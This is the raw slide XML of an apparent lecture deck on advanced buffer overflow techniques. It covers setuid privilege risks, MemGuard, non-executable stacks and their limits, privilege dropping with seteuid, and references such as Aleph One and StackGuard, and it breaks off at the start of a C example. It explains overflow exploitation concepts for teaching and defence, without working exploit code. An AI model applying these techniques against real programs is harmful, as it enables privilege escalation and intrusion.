              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>) programs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>A set-user-id program can cause it to become another user when it executes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It seems that if the program is not running </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> root, user cannot achieve greater access levels.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>However, we never know who is going to take the program and set the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>suid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> bit on the binary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Even if the users </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>of the software </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>have no </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>privileges at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>all, any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>successful buffer overflow attack </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>can still let them execute some unexpected code.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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6393C965-ADCE-4959-9138-3D697148B555}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="457200"/>
            <a:ext cx="7772400" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>MemGuard</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>It protects the return address when a function is called, and un-protects the address when the function returns</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Mark the virtual memory pages containing the return address as read-only</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Install a trap handler that catches writes to protected pages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524F523C-7E0A-4445-92E7-B9A66ABDD5EE}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="40963" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="457200"/>
            <a:ext cx="7772400" cy="6172200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Non-executable user stack area</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>It is possible to modify the kernel of any OS so that the stack segment is not executable.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Problem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Attackers can simply force the system to call other “interesting” locations already in the program.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Cannot prevent heap overflow.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>uses executable stacks for function trampolines, (code in the stack created in run time) for nested functions.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Linux uses executable user stacks for signal handling.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Functional programming languages, and some other programs, rely on executable stacks for run-time code generation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="3200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="32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78062D89-79C9-4868-9CCD-02B190C34A4D}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="36866" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="4000" dirty="0" smtClean="0"/>
              <a:t>Advanced Buffer Overflow Techniques</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24580" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1524000"/>
            <a:ext cx="7772400" cy="5105400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Change </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>uid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>As programs run with root permission are dangerous, some programs may</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>seteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> at start.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> returns the real user ID, which identifies the user launching the application, of the calling process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>seteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> sets the effective user ID, which is used in most access control decisions, of the calling process.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Later, only call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>seteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>(0)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>needed and call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>seteuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1"/>
              <a:t>getuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0"/>
              <a:t>())</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> again afterwards</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="zh-TW"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17C5F657-AF92-4DE5-A787-AD04DBF204CB}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41988" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Aleph One, “Smashing The Stack for Fun and Profit”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Phrack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> 49 Volume 7, Issue 49, File 14 of 16.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Taeho</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t> Oh, “Advanced buffer overflow exploit”.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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A0BE70CF-196F-4840-81F1-117F8F051087}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>C. Cowan, C. Pu, and D. Maier. StackGuard: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" smtClean="0"/>
              <a:t>Proceedings of the 7th USENIX Security Symposium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>, pages 63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>78, 1998.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>P. Wagle, C. Cowan. StackGuard: Simple Stack Smash Protection for GCC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" smtClean="0"/>
              <a:t>Proceedings of the GCC Developers Summit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>, pp. 243-256, 2003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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A0BE70CF-196F-4840-81F1-117F8F051087}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35842" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" smtClean="0"/>
              <a:t>Reference</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43012" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>C. Cowan, C. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Pu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, and D. Maier. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: Automatic Adaptive Detection and Prevention of Buffer-Overflow Attacks. In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>Proceedings of the 7th USENIX Security Symposium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, pages 63</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>–</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>78, 1998.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>P. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>Wagle</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, C. Cowan. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" err="1" smtClean="0"/>
              <a:t>StackGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>: Simple Stack Smash Protection for GCC. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" dirty="0" smtClean="0"/>
              <a:t>Proceedings of the GCC Developers Summit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>, pp. 243-256, 2003</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW"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F0B8EFD-638F-4272-8A8B-E31406420F31}" type="slidenum">
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400"/>
              <a:pPr eaLnBrk="1" hangingPunct="1">
                <a:spcBef>
                  <a:spcPct val="0"/>
                </a:spcBef>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="zh-TW" sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28675" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="838200"/>
            <a:ext cx="7772400" cy="5257800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>One may think that even if the buffer is overflowed and the shell code is executed, there is no harm since the hacker can only get his own shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="3124200"/>
            <a:ext cx="4876800" cy="2362200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFCC66"/>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600" dirty="0"/>
              <a:t>#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>#include&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0" err="1"/>
              <a:t>unistd.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1600" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
